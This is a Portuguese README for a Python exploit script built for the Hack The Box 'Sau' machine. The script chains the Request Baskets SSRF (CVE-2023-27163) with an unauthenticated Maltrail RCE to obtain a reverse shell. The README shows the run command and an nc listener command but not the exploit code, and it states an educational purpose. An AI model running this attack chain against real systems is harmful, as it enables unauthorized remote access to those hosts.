
Cadeia de exploração automatizada para HTB Sau — CVE-2023-27163 (SSRF) + RCE não autenticado do Maltrail → Reverse Shell
Um script de exploit em Python que combina a CVE-2023-27163 (Server-Side Request Forgery no Request Baskets ≤ 1.2.1) com uma vulnerabilidade de Remote Code Execution não autenticada no Maltrail 0.53, entregando um reverse shell. Projetado para a máquina Sau do Hack The Box.
Este script automatiza o caminho de exploração necessário para obter acesso inicial ao alvo:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
Exemplo:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
Antes de executar o exploit, inicie um listener na sua máquina para capturar o reverse shell:
nc -lvnp <LISTENER_PORT>
Exemplo:
nc -lvnp 4444
| Parâmetro | Descrição |
|---|---|
TARGET_URL | URL base do alvo (ex.: http://IP) |
LISTENER_IP | IP da sua máquina atacante |
LISTENER_PORT | Porta para receber o reverse shell |
bucket_url)/ final da URL do alvo (tratado automaticamente no script)Este projeto destina-se a fins educacionais e ao uso em ambientes autorizados, como o Hack The Box. Não use contra sistemas sem a devida permissão.